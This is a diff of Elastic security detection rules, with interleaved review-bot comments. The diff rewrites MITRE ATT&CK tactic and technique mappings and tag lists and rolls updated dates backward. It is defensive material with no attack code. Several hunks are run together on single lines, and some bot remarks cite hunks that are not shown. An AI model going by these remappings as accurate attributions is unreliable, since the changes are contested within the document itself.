--- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
+++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/13"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
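Review bot: The replacement mapping in the first hunk, `+id = "T1055.012"` / `+name = "Process Hollowing"` under Privilege Escalation, is a looser fit than the one it replaces for a rule that keys on parent/child pairs (the hunk context is `process.parent.name != null and`, and the file is the unusual-parent-child rule): hollowing is about replacing a process image, whereas an unexpected parent is the Break Process Trees / Parent PID Spoofing family. Unless this is a deliberate restore of an earlier mapping, consider keeping `T1036.009` under Defense Evasion alongside the new entry, together with the `Tactic: Defense Evasion` tag that the tags hunk of this file drops, rather than replacing it. As written, the tags hunk (`Tactic: Privilege Escalation` replacing `Tactic: Defense Evasion`) and this threat hunk are at least consistent with each other.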
@@ -110,26 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
+[[rule.threat.technique.subtechnique]]
+id = "T1055.012"
+name = "Process Hollowing"
+reference = "https://attack.mitre.org/techniques/T1055/012/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
+[[rule.threat.technique.subtechnique]]
+id = "T1055.012"
+name = "Process Hollowing"
+reference = "https://attack.mitre.org/techniques/T1055/012/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/privilege_escalation_via_ppid_spoofing.toml b/rules/windows/privilege_escalation_via_ppid_spoofing.toml
index 320714b320d..35699123c49 100644
--- a/rules/windows/privilege_escalation_via_ppid_spoofing.toml
+++ b/rules/windows/privilege_escalation_via_ppid_spoofing.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/10/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/01"
 [rule]
 author = ["Elastic"]
@@ -136,18 +136,24 @@ Parent Process ID (PPID) spoofing is a technique where adversaries manipulate th
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
+[[rule.threat.technique.subtechnique]]
+id = "T1134.002"
+name = "Create Process with Token"
+reference = "https://attack.mitre.org/techniques/T1134/002/"
 [[rule.threat.technique.subtechnique]]
 id = "T1134.004"
 name = "Parent PID Spoofing"
 reference = "https://attack.mitre.org/techniques/T1134/004/"
+
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml
index bcceba7f00e..cb89a43db4b 100644
--- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml
+++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/13"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -93,18 +93,14 @@ file where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
-[[rule.threat.technique.subtechnique]]
-id = "T1134.001"
-name = "Token Impersonation/Theft"
-reference = "https://attack.mitre.org/techniques/T1134/001/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml
index 57d314c6ce0..d6c46d38039 100644
--- a/rules/windows/privilege_escalation_via_token_theft.toml
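Review bot: The rogue-named-pipe hunk (`@@ -93,18 +93,14 @@`) drops the subtechnique `T1134.001` / `Token Impersonation/Theft` and leaves only the parent `T1134`; named-pipe impersonation is the textbook case of that subtechnique, so the new side is strictly less precise than the old one with no visible reason. In the PPID-spoofing hunk (`@@ -136,18 +136,24 @@`), `+id = "T1134.002"` / `+name = "Create Process with Token"` is added next to `T1134.004`; that is a different primitive from parent-PID spoofing, so it is worth confirming the rule's query (outside this hunk) actually covers token-based process creation before advertising it in the mapping. If both changes are intentional restores of earlier mappings, a sentence in the commit message would spare the next reviewer the same question.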
+++ b/rules/windows/privilege_escalation_via_token_theft.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/10/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/07"
 [rule]
 author = ["Elastic"]
@@ -22,7 +22,14 @@ references = [
 risk_score = 73
 rule_id = "02a23ee7-c8f8-4701-b99d-e9038ce313cb"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+    "Domain: Endpoint",
+    "OS: Windows",
+    "Use Case: Threat Detection",
+    "Tactic: Privilege Escalation",
+    "Data Source: Elastic Defend",
+    "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -142,36 +149,19 @@ In Windows environments, processes can be created with elevated tokens to perfor
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1134.002"
 name = "Create Process with Token"
 reference = "https://attack.mitre.org/techniques/T1134/002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1134"
-name = "Access Token Manipulation"
-reference = "https://attack.mitre.org/techniques/T1134/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1134.002"
-name = "Create Process with Token"
-reference = "https://attack.mitre.org/techniques/T1134/002/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
index 906baeca97c..5bbc32c2c97 100644
--- a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
+++ b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/07"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,14 @@ Audit Security System Extension (Success)
 ```
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
+tags = [
+    "Domain: Endpoint",
+    "OS: Windows",
+    "Use Case: Threat Detection",
+    "Tactic: Privilege Escalation",
+    "Data Source: Windows Security Event Logs",
+    "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -102,36 +109,19 @@ configuration where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1543.003"
-name = "Windows Service"
-reference = "https://attack.mitre.org/techniques/T1543/003/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules_building_block/collection_archive_data_zip_imageload.toml b/rules_building_block/collection_archive_data_zip_imageload.toml
index 8b65f51a63a..445af055e36 100644
--- a/rules_building_block/collection_archive_data_zip_imageload.toml
+++ b/rules_building_block/collection_archive_data_zip_imageload.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/06"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2024/05/21"
 [rule]
 author = ["Elastic"]
@@ -56,18 +56,14 @@ library where host.os.type == "windows" and event.action == "load" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
 reference = "https://attack.mitre.org/techniques/T1560/"
-[[rule.threat.technique.subtechnique]]
-id = "T1560.002"
-name = "Archive via Library"
-reference = "https://attack.mitre.org/techniques/T1560/002/"
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
diff --git a/rules_building_block/collection_common_compressed_archived_file.toml b/rules_building_block/collection_common_compressed_archived_file.toml
index b67d9497997..5742ea8c024 100644
--- a/rules_building_block/collection_common_compressed_archived_file.toml
+++ b/rules_building_block/collection_common_compressed_archived_file.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2023/10/11"
 integration = "endpoint"
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/09"
 [rule]
 author = ["Elastic"]
@@ -76,13 +76,58 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1074"
+name = "Data Staged"
+reference = "https://attack.mitre.org/techniques/T1074/"
+[[rule.threat.technique.subtechnique]]
+id = "T1074.001"
+name = "Local Data Staging"
+reference = "https://attack.mitre.org/techniques/T1074/001/"
+
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
 reference = "https://attack.mitre.org/techniques/T1560/"
+[[rule.threat.technique.subtechnique]]
+id = "T1560.001"
+name = "Archive via Utility"
+reference = "https://attack.mitre.org/techniques/T1560/001/"
+
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1132"
+name = "Data Encoding"
+reference = "https://attack.mitre.org/techniques/T1132/"
+[[rule.threat.technique.subtechnique]]
+id = "T1132.001"
+name = "Standard Encoding"
+reference = "https://attack.mitre.org/techniques/T1132/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
+
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules_building_block/collection_microsoft_purview_dlp_signal.toml b/rules_building_block/collection_microsoft_purview_dlp_signal.toml
index b824d6ba8a3..bfc6b8ca0b3 100644
--- a/rules_building_block/collection_microsoft_purview_dlp_signal.toml
+++ b/rules_building_block/collection_microsoft_purview_dlp_signal.toml
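Review bot: `Tactic: Command and Control` and `Tactic: Defense Evasion` tags have no hunk in this patch for collection_common_compressed_archived_file.toml (the preceding section for that file holds only the `updated_date` change), yet this hunk adds `[[rule.threat]]` entries under `TA0011` and `TA0005`; either those tags are already present in the file, or the new threat mapping and the tag list now disagree, which is exactly what a tactic/tag cross-check in the rule test suite would report. The same question applies to the insider-risk hunk further down (`@@ -53,3 +53,24 @@`, which adds Collection, Exfiltration and Impact tactics with no tags hunk) and to the PowerShell-compression hunk (`@@ -207,26 +207,34 @@`, which adds Execution). Worth confirming the three files' tag lists before merging, since the patch does not show them.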
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2026/02/20"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/20"
 [rule]
 author = ["Elastic"]
@@ -56,34 +56,13 @@ event.dataset:o365.audit and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1114"
-name = "Email Collection"
-reference = "https://attack.mitre.org/techniques/T1114/"
-
-[[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
-
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
-
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
diff --git a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml
index ecf0303733a..20d080f5445 100644
--- a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml
+++ b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2026/02/20"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/20"
 [rule]
 author = ["Elastic"]
@@ -53,3 +53,24 @@ event.dataset:o365.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules_building_block/collection_posh_compression.toml b/rules_building_block/collection_posh_compression.toml index 9ef72645996..621b225c547 100644 --- a/rules_building_block/collection_posh_compression.toml +++ b/rules_building_block/collection_posh_compression.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -207,26 +207,34 @@ value = "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1560.002" -name = "Archive via Library" -reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index 07bb5150945..3952b06069b 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
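Review bot: The new `[[rule.threat]]` entry for TA0002 Execution (T1059 / T1059.001 PowerShell) adds a tactic to this rule, but the only other hunk for this file is the `updated_date` change, so `tags` is not touched; unless `Tactic: Execution` is already present in the rule's tags, the tactic-to-tag consistency check added to tests/test_all_rules.py in this series will report it as missing. Please confirm the existing tag list or add `"Tactic: Execution",` in the same commit. The T1560.001 and T1560.002 subtechniques are also dropped from the Collection entry while the parent T1560 stays; that may be intentional, but it is not mentioned anywhere in the patch.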
@@ -26,7 +26,17 @@ name = "Bitsadmin Activity" risk_score = 21 rule_id = "8eec4df1-4b4b-4502-b6c3-c788714604c9" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -47,26 +57,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml index f135e42a29f..5701fe075a7 100644 --- a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml 
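Review bot: The rewritten `tags` list in the `@@ -26,7 +26,17 @@` hunk drops `Tactic: Defense Evasion` and `Tactic: Persistence`, but the threat hunk below keeps both the TA0005 and TA0003 entries (each mapped to T1197 BITS Jobs) alongside the new TA0011 entry, so the mapping lists three tactics while the tags list one. The tactic-to-tag consistency check introduced in this series would report the two tags as missing. Either add `"Tactic: Defense Evasion",` and `"Tactic: Persistence",` back to the list, or drop the two threat entries if the intent was to narrow this rule to Command and Control.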
+++ b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/09" [rule] author = ["Elastic"] @@ -26,7 +26,18 @@ references = [ risk_score = 21 rule_id = "e9a3b2c1-d4f5-6789-0abc-def123456789" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Initial Access", "Data Source: Elastic Defend", "Domain: LLM", "Mitre Atlas: T0010.003", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Domain: LLM", + "Mitre Atlas: T0010.003", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" 
@@ -45,49 +56,31 @@ network where event.action == "lookup_requested" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0012" -name = "Valid Accounts" -reference = "https://atlas.mitre.org/techniques/AML.T0012/" - -[rule.threat.tactic] -id = "AML.TA0004" -name = "Initial Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0004/" diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml index 9ec279e6d2c..74f8692331c 100644 --- a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml +++ b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] 
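Review bot: The TA0001 Initial Access entry (T1195 / T1195.002) is kept on the new side of this hunk, but the `tags` rewrite in the previous hunk of this file removed `Tactic: Initial Access`, so the tags and the mapping now disagree on that tactic; restoring `"Tactic: Initial Access",` to the list resolves it. Conversely, the MITRE ATLAS `[[rule.threat]]` entry (AML.T0012 / AML.TA0004) is deleted while the `Mitre Atlas: T0010.003` tag survives; I can't tell from the diff whether that tag is meant to stand on its own without an ATLAS framework entry, so it is worth a second look.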
@@ -31,7 +31,19 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Use Case: Threat Detection", "Use Case: Identity Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Protection", + "Use Case: Threat Detection", + "Use Case: Identity Threat Detection", + "Tactic: Credential Access", + "Tactic: Initial Access", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -42,17 +54,29 @@ event.dataset:o365.audit and event.code:AadRiskDetection [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml index 2981a5ea562..6eb634e33de 100644 --- a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml 
+++ b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/08/18" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -49,18 +49,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml index bef39605f7d..666c28d4f06 100644 --- a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml +++ b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/09/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
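Review bot: The technique for this rule changes from T1552 / T1552.001 Credentials In Files to T1003 OS Credential Dumping with no subtechnique. Going only by the filename (apppoolsa_pwd_appcmd), the rule appears to cover retrieval of stored application-pool passwords via appcmd, which the removed T1552.001 mapping described directly, whereas T1003 is a broader label; please confirm this remapping is intended rather than a side effect of the bulk update. If the old mapping was correct, restoring the removed `T1552` technique block and its `T1552.001` subtechnique is the fix.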
@@ -20,7 +20,15 @@ name = "Memory Dump File with Unusual Extension" risk_score = 21 rule_id = "c0b9dc99-c696-4779-b086-0d37dc2b3778" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -44,18 +52,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.008" name = "Masquerade File Type" reference = "https://attack.mitre.org/techniques/T1036/008/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_dll_hijack.toml b/rules_building_block/defense_evasion_dll_hijack.toml index 9c6d6a93c4a..87e086c3d31 100644 --- a/rules_building_block/defense_evasion_dll_hijack.toml +++ b/rules_building_block/defense_evasion_dll_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] 
